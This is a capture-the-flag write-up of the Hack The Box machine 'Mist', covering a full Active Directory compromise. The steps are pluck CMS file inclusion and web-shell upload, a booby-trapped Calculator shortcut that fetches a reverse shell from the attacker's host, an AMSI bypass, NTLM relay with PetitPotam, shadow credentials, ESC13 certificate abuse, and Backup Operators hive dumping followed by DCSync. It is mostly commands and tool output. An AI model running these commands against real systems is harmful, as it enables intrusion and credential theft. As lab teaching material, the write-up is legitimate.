HTB - Mist

Description

Mist is an Insane-difficulty machine that provides a comprehensive scenario for exploiting various misconfigurations and vulnerabilities in an Active Directory (AD) environment. The machine has multiple layers, starting with a public-facing CMS running on Apache with a path traversal vulnerability, allowing us to retrieve a backup file containing hashed credentials. Cracking this hash grants initial access as a low-privileged web user. Exploiting file-write permissions on a shared directory further elevates our access by allowing a reverse shell connection as another domain user. From there, enumeration reveals several AD misconfigurations, including LDAP signing disabled, WebDAV exploitation, and misconfigurations in ADCS templates, each step designed to escalate privileges through different AD entities. The final exploit involves creating shadow credentials to acquire the machine account’s NTLM hash, enabling a DCSync attack to obtain the Domain Administrator hash.

Enumeration

Nmap Scan

nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan

PORT   STATE SERVICE
80/tcp open  http

nmap -sCV -p80 $ip -Pn -oN Nmap/Script-scan

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)

HTTP

http://10.10.11.17?file=mist

When clicking admin word, I was redirected to this login page

The version of pluck is 4.7.18. A quick search of the version in exploit-db the site leads to this CVE, but I don't have the admin password yet.

After deep searching for other pluck CVEs, I found unauthenticated LFI

Vulnerability Details

Following this post , I have to look under /data/settings/modules/albums folder, and I found admin_backup.php

When I included admin_backup.php, I got a hash, so I will try to crack it

On https://crackstation.net/, I was able to crack it

Initial Access

When I used the cracked password to log in as admin, I was redirected to the admin portal

Now with the admin password, I can get RCE via the CVE we found before

I read the exploit and decided to perform it manually rather than using the poc.

First, Go to http://10.10.11.17/admin.php?action=installmodule

Second, create a zip file containing php a shell. I will use P0wny Shell and upload it

zip module.zip p0wny.php

Finally, access the webshell at http://10.10.11.17/data/modules/module/p0wny.php

I will upgrade my shell with PowerJoker to get more flexibility because the installed modules don't persist. Maybe there is a script in the background removing them.

Lateral Movement

Looking for internal ports, there are RPC, SMB, and WinRM. That confirms there is firewall rules that prevent most inbound connections to MS01

JokerShell C:\xampp\htdocs\data> netstat -ano | findstr TCP
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2412
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       852
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2412
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  ..snip..

Looking at IP configuration, I found that MS01 has a different IP 192.168.100.101 with hostname of ms01.mist.htb

JokerShell C:\> ipconfig

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.100.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.100

JokerShell C:\> nslookup ms01

DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  192.168.100.100

Name:    ms01.mist.htb
Address:  192.168.100.101

I also wanted to check AV status, So I executed this command Get-MpComputerStatus and found that it's already running on the box

JokerShell C:\Users\svc_web> Get-MpComputerStatus


AMEngineVersion                  : 1.1.24020.9
AMProductVersion                 : 4.18.24020.7
AMRunningMode                    : Normal
AMServiceEnabled                 : True
AMServiceVersion                 : 4.18.24020.7
AntispywareEnabled               : True
AntispywareSignatureAge          : 378
AntispywareSignatureLastUpdated  : 3/26/2024 4:22:59 AM
AntispywareSignatureVersion      : 1.407.725.0
AntivirusEnabled                 : True
AntivirusSignatureAge            : 378
AntivirusSignatureLastUpdated    : 3/26/2024 4:22:59 AM
AntivirusSignatureVersion        : 1.407.725.0
BehaviorMonitorEnabled           : True

I want to find possible escalation path on ms01, so I uploaded winpeas.ps1 and PowerUp.ps1 to the box but since AV is enabled, I had to bypass AMSI first.

I created a bypass.ps1 containing common AMSI bypass (patching amsiScanBuffer), Then load the PowerUp.ps1 script

iex(iwr -UseBasicParsing 10.10.16.4/bypass.ps1)
iex(iwr -UseBasicParsing 10.10.16.4/PowerUp.ps1); Invoke-AllChecks

Unfortunately, I didn't find any exploitation path with PowerUp tool but under C:\ There is an uncommon folder

JokerShell C:\> ls

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2024   1:50 AM                Common Applications
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         2/20/2024   5:44 AM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---         2/21/2024  12:37 PM                Users
d-----         3/26/2024  12:02 PM                Windows
d-----         3/10/2024   3:21 AM                xampp

JokerShell C:\Common Applications> dir

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/8/2021   1:15 AM           1118 Calculator.lnk
-a----          5/7/2021   3:14 PM           1175 Notepad.lnk
-a----          5/7/2021   3:15 PM           1171 Wordpad.lnk

They are .lnk files to execute common programs on the system.

JokerShell C:\Common Applications> type Calculator.lnk
L?F?)@%SystemRoot%\system32\shell32.dll,-22531%windir%\system32\win32calc.exef  ?-1SPS??XF?L8C???&?m?-1SPSU(L?y?9K????-????%windir%\system32\win32calc.exe%windir%\system32\win32calc.exe

What if I can overwrite one of them and add a path to execute a reverse shell when one uses it??. First, I need to check my permission over this folder

JokerShell C:\> icacls 'Common Applications'
Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                    MS01\Administrator:(OI)(CI)(F)
                    BUILTIN\Administrators:(OI)(CI)(F)
                    BUILTIN\Users:(OI)(CI)(RX,W)

From the output above, The BUILTIN\Users has write access on the folder(RX,W).

On my Windows host, I create a new shortcut

On the target field, I put this payload, and inside rev.ps1 It is an encoded reverse shell

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex(iwr -UseBasicParsing 10.10.16.4/rev.ps1)

Also, I changed the icon to match Calculator icon from C:\Windows\System32\calc.exe to make things as real and tricky as possible

Now, I will upload it to the box

iwr 10.10.16.4/Calculator.lnk -outfile .\Calculator.lnk

After a short time (1-2 mins), I got a shell as brandon.keywarp

The user is indeed a domain user and it has a profile folder beside other users, too

JokerShell C:\> whoami /all

USER INFORMATION
----------------

User Name            SID                                           
==================== ==============================================
mist\brandon.keywarp S-1-5-21-1045809509-3006658589-2426055941-1110

JokerShell C:\Users> dir

    Directory: C:\Users

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----          4/8/2025   1:00 PM                Administrator
d-----         2/20/2024   6:02 AM                Administrator.MIST
d-----          4/8/2025   1:00 PM                Brandon.Keywarp
d-r---         2/20/2024   5:44 AM                Public
d-----         2/20/2024   9:39 AM                Sharon.Mullard
d-----          4/8/2025  12:59 PM                svc_web

I can guess that Sharon.Mullard is a domain user, too.

At this point, with a domain user, I have to pivot to enumerate the domain controller with ligolo-ng

./proxy -selfcert // On Linux Attack Host

In a Windows box (MS01), Run:

JokerShell C:\xampp\htdocs> iwr 10.10.16.4/agent.exe -outfile .\agent.exe
JokerShell C:\xampp\htdocs> Start-Process agent.exe -ArgumentList "-connect 10.10.16.4:11601 -ignore-cert"

Make sure you're in C:\xampp\htdocs because it's excluded from defender

After pivoting, I can run Nmap and see the results:

nmap -iL ip.txt -F -Pn 

Nmap scan report for 192.168.100.100

PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds

Nmap scan report for 192.168.100.101

PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds

Looking for Remote management ports, I found WinRM is running on the two hosts

nmap -iL ip.txt -p5985,3389,5986 --open 

Nmap scan report for 192.168.100.100

PORT     STATE SERVICE
5985/tcp open  wsman

Nmap scan report for 192.168.100.101

PORT     STATE SERVICE
5985/tcp open  wsman

Script scan for the DC

nmap -sCV -p53,88,135,139,389,445,5985 192.168.100.100 -oN Nmap/dc-scan

Nmap scan report for 192.168.100.100

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-08 20:46:19Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mist.htb0., Site: Default-First-Site-Name)
| Subject Alternative Name: DNS:DC01.mist.htb
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

I will add the two machines to my /etc/hosts file

echo '192.168.100.100 dc01 dc01.mist.htb mist.htb' | sudo tee -a /etc/hosts
echo '192.168.100.101 ms01 ms01.mist.htb' | sudo tee -a /etc/hosts

My next move is to enumerate both the shared folders and the domain acls With Bloodhound, so I will upload SharpHound.exe to the host and begin the collection

I still couldn't access shared folders with no credentials

nxc smb ip.txt -u 'guest' -p '' --shares

SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.101 445    MS01             [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED 
SMB         192.168.100.100 445    DC01             [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED 

nxc smb ip.txt -u '' -p '' --shares 

SMB         192.168.100.100 445    DC01             [+] mist.htb\: 
SMB         192.168.100.100 445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
SMB         192.168.100.101 445    MS01             [-] mist.htb\: STATUS_ACCESS_DENIED

Privilege Escalation (MS01)

I didn't find anything that can be useful till now, So there is an attack I have to try (NTLM Relay over LDAP using WebDav) And this post is useful for performing the attacks: Post

I already know what to do, So I will proceed directly with these steps:
1. check if webdav is running
2. If webdav is not running, try to enable it
3. Using any coercion method (printerbug, PetitPotam, coercer, etc) to force the machine to authenticate to my host
4. Set up a relay agent on my host to relay the authentication coming from HTTP (WebDav) to LDAP and perform RBCD or Shadow Credential Attack

Performing RBCD depending on having account with SPN or ability to create a machine account, but Shadow Credentials depends on PKINIT authentication (usually when ADCS is installed)

When I enumerated the domain to see if I can add computer account or not, I found the value of ms-ds-machineaccountquota zero, So I can't do it.

JokerShell C:\xampp\htdocs> Get-DomainObject -Identity "DC=mist,DC=htb" -Properties ms-DS-MachineAccountQuota

ms-ds-machineaccountquota
-------------------------
                        0

When I enumerated the domain to see if I can add computer account or not, I found msds-keycredentiallink contains a value, So Shadow Credential attack is possible.

JokerShell C:\xampp\htdocs> Get-DomainObject -Identity MS01 -Properties msds-keycredentiallink

msds-keycredentiallink
----------------------                                                                                                 
B:828:0002000020000119F0F375256AB2B1C4FC2BDFEFAD0D21AA3D5C36890AED2D7F6FE4F3DAB2C9A62000020F090A50EB5AEE1B926A4341..snip..

Now, Let's deal with WebDav, I downloaded SharpWebClientScanner.exe to query the its status but I didn't find it to be running on any host, So I have to enable it manually.

JokerShell C:\xampp\htdocs> .\SharpWebClientScanner.exe --domain mist.htb

??????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????
                                                                              By Mor David

[x] Unable to reach DAV pipe on MS01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on DC01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on svc_ca, system is either unreachable or does not have WebClient service running

I will use this Tool to enable it from Windows

sudo apt install mono-compelete
mcs EtwStartWebClient.cs -out:EtwStartWebClient.exe /unsafe
iwr 10.10.16.4:8000/EtwStartWebClient.exe -o .\EtwStartWebClient.exe

Verify with SharpWebScanner

Then, execute the tool windows

JokerShell C:\xampp\htdocs> .\EtwStartWebClient.exe
[+] WebClient Service started successfully

Now, I need to use the coerce method, but I need credentials for it. I only have a shell with a domain user brandon.keywarp But with no password or hash.

There is one way to get the hash of the user using ADCS templates to request a certificate for the user and get their NT hash from it.

First, Upload Certify to the machine and request a certificate for the current user

.\Certify.exe request /template:User /ca:DC01\mist-DC01-CA

Copy the cert.pem (private key & Certificate) , then use this command

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

With Certipy, I can authenticate to the domain and get the hash

certipy-ad auth -pfx cert.pfx -domain mist.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: brandon.keywarp@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'brandon.keywarp.ccache'
[*] Trying to retrieve NT hash for 'brandon.keywarp'
[*] Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1xxxxxxxxxxx

For WebDav to function, It needs the hostname to connect to, but my host isn't accessible from the internal network, so I will add a port forwarding rule so that any connection that comes to ms01 . 8888 is forwarded to me at 80

[Agent : MIST\Brandon.Keywarp@MS01] » listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80 --tcp
INFO[8701] Listener 0 created on remote agent!

Since we found before that MS01$ has keyCredentialLink value, we need a tool to clear it and add a new one, and this is included in this version of ntlmrelayx.py After adding a new feature in this pull request.

git clone https://github.com/fortra/impacket/ && cd impacket; git fetch origin pull/1402/head:mist && git checkout mist; 

python -m venv . && source ./bin/activate; pip install . && pip install -r requirements.txt && pip install pyOpenSSL==24.0.0 && pip install setuptools

Execute the attack

python3 PetitPotam.py -u 'brandon.keywarp' -hashes :db03d6a77a2205bc1d07082740626cc9 MS01@8888/files 192.168.100.101

sudo ntlmrelayx.py -debug -t ldaps://192.168.100.100 -i -smb2support -domain mist.htb

nc localhost 11000

$ clear_shadow_creds ms01$
$ set_shadow_creds ms01$

Get a sutiable cert to be used with certipy

cert -export -pfx /home/kali/vault/Hacking/Mist/impacket/e1LybMof.pfx  -password 'y5hd2VIzZgXcGREYy0uJ' -out cert.pfx

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'cert.pfx'

Authenticate to the DC using the certificate and get NT hash of the computer account.

certipy-ad auth -pfx cert.pfx -domain mist.htb -username 'MS01$' -dc-ip 192.168.100.100 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:17749fa7409ac85c4zzzzzzzzzzzz

With the computer account hash, I can create a Silver ticket to access the file system as an administrator

impacket-ticketer -nthash 17749fa7409ac85c4zzzzzzzzzzzz -domain mist.htb -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -spn cifs/ms01.mist.htb Administrator

export KR5CCNAME=`pwd`/Administrator.ccache

Access the machine as an administrator

impacket-wmiexec -k -no-pass MS01.MIST.HTB  

[*] SMBv3.0 dialect used

C:\>whoami
mist.htb\administrator

I will dump SAM to save my progress

impacket-secretsdump -no-pass -k ms01.mist.htb

[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c40xxxxxxxx:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39bxxxxxxxxx:::

Connect to the box with a local admin account:

evil-winrm -i ms01 -u Administrator -H 711e6a685af1c31c402xxxxxxxxxxxx

*Evil-WinRM* PS C:\Users> type Administrator\Desktop\user.txt

User Flag: 0c63be3b856709838ec62a926dbad528

Privilege Escalation (DC01)

Inside Sharon.Mullard folder, there are several files

*Evil-WinRM* PS C:\Users\Sharon.Mullard> tree /F

C:.
+---Desktop
+---Documents
¦       sharon.kdbx
¦
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
¦       cats.png
¦       image_20022024.png

The file .kdbx is certainly keepass password manager, So it will be protected by a password.

Cats.png has nothing rather than cats images

image_200222024.png has something interesting:

A string that's been partially hidden and encoded using base64

UA7cpa[#1!_*ZX

I will attempt it against keepass hash to crack it but I think I will need to do a brute force attack using hashcat. First, get the hash of keepass the database

keepass2john sharon.kdbx > keepass.hash

The input in the image was 15 chars and the string I have is 14 chars, So I can only append one ?a , which means all possible chars in hashcat

hashcat -m 13400 -a 3 keepass.hash 'UA7cpa[#1!_*ZX?a'

..snip..

$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d5871520815f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc:UA7cpa[#1!_xxxxx

Session..........: hashcat
Status...........: Cracked

To open keepass file from Linux, I used keepassxc

sudo apt install keepassxc
keepassxc sharon.kdbx

Trying the password for all users I don't have yet, and got one user

nxc ldap dc01 -u users.lst -p 'ImTiredxxxxxxx' 

LDAP        192.168.100.100 389    DC01             [-] mist.htb\Florence.Brown:xxxxxxxxxxxxxxxxx 
LDAP        192.168.100.100 389    DC01             [-] mist.htb\Jonathan.Clinton:xxxxxxxxxxxxxxxxx
LDAP        192.168.100.100 389    DC01             [-] mist.htb\Markus.Roheb:xxxxxxxxxxxxxxxxx 
LDAP        192.168.100.100 389    DC01             [-] mist.htb\Shivangi.Sumpta:xxxxxxxxxxxxxxxxx 
LDAP        192.168.100.100 389    DC01             [-] mist.htb\Harry.Beaucorn:xxxxxxxxxxxxxxxxx( 
LDAP        192.168.100.100 389    DC01             [+] mist.htb\op_Sharon.Mullard:xxxxxxxxxxxxxxxxx

Looking At bloodhound CE, User Op_sharon.mullard is a member of operatives group which can ReadGMSAPassword of Svc_CA$

┌─[kali@parrot]─[~/HackTheBox/platform/machines/mist]
└──╼ $nxc ldap dc01 -u op_Sharon.Mullard -p 'ImTirxxxxxxxxx' --gmsa

LDAPS  192.168.100.100 636  DC01 [*] Getting GMSA Passwords
LDAPS  192.168.100.100 636  DC01 Account: svc_ca$ NTLM:09814d63c9baxxxxxxxxxxxx

SVC_CA$ can add KeyCredentialLink (Shadow Credential) to svc_cabackup

certipy-ad shadow auto -u 'svc_ca$@mist.htb' -hashes :09814d63c9baxxxxxxxxxxxx-account svc_cabackup

ESC13: If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.

Source post.

From bloodhounoI can see that being a member of Certificate Services group, I can abuse ESC13 and add myself or anyone I want to Certificate Managers group

Certificate Managers group is a member of CA Backup group

CA Backup A group's member can perform ESC13, too, and get a membership in Services acountsthe group that is a member of Backup Operators group.

To summarize the attack path:

Perform ESC13 to inherit the privileges of Certificate Managers group
Perform ESC13 inherit the privileges of Services acounts group
Inherit Backup Operators privileges being in Services acounts group

Request a certificate for the vulnerable template managerauthentication

certipy-ad req -u 'svc_cabackup@mist.htb' -hashes :c9872f1bc10bdd522c12fc2ac9041b64 -template managerauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100

Authenticate as svc_cabackup to Inherit the new privileges

certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb
impacket-ticketConverter svc_cabackup.kirbi svc_cabackup.ccache

Request a certificate for the vulnerable template backupsvcauthentication

certipy req -u 'svc_cabackup@mist.htb' -k -template backupsvcauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100 -target dc01.mist.htb

Authenticate as svc_cabackup to Inherit the new privileges

certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb
impacket-ticketConverter svc_cabackup.kirbi svc_cabackup2.ccache

Abuse Backup Operator to backup Registry hives

impacket-reg -k -no-pass mist.htb/svc_cabackup@dc01.mist.htb backup -o '\programdata'

Access the DC to download the files via winRM

evil-winrm -i dc01 -u op_Sharon.Mullard -p 'ImTiredOfThisJob:('

*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> cd C:\programdata

*Evil-WinRM* PS C:\programdata> download SAM.save

Info: Downloading C:\programdata\SAM.save to SAM.save
Info: Download successful!

*Evil-WinRM* PS C:\programdata> download SECURITY.save

Info: Downloading C:\programdata\SECURITY.save to SECURITY.save
Info: Download successful!

*Evil-WinRM* PS C:\programdata> download SYSTEM.save
Info: Downloading C:\programdata\SYSTEM.save to SYSTEM.save
Info: Download successful!

Dump the hives' secrets and perform DCSync with dc01$ account hash

impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL

impacket-secretsdump mist.htb/'DC01$'@dc01 -hashes :e768c4cf883a87ba9e96278990292260 -just-dc-ntlm

Access the machine as Administrator

Root Flag: f5dcf7a3f2377ef6759aa413c768303f

PreviousHTB - Rebound NextEasy

Last updated 8 months ago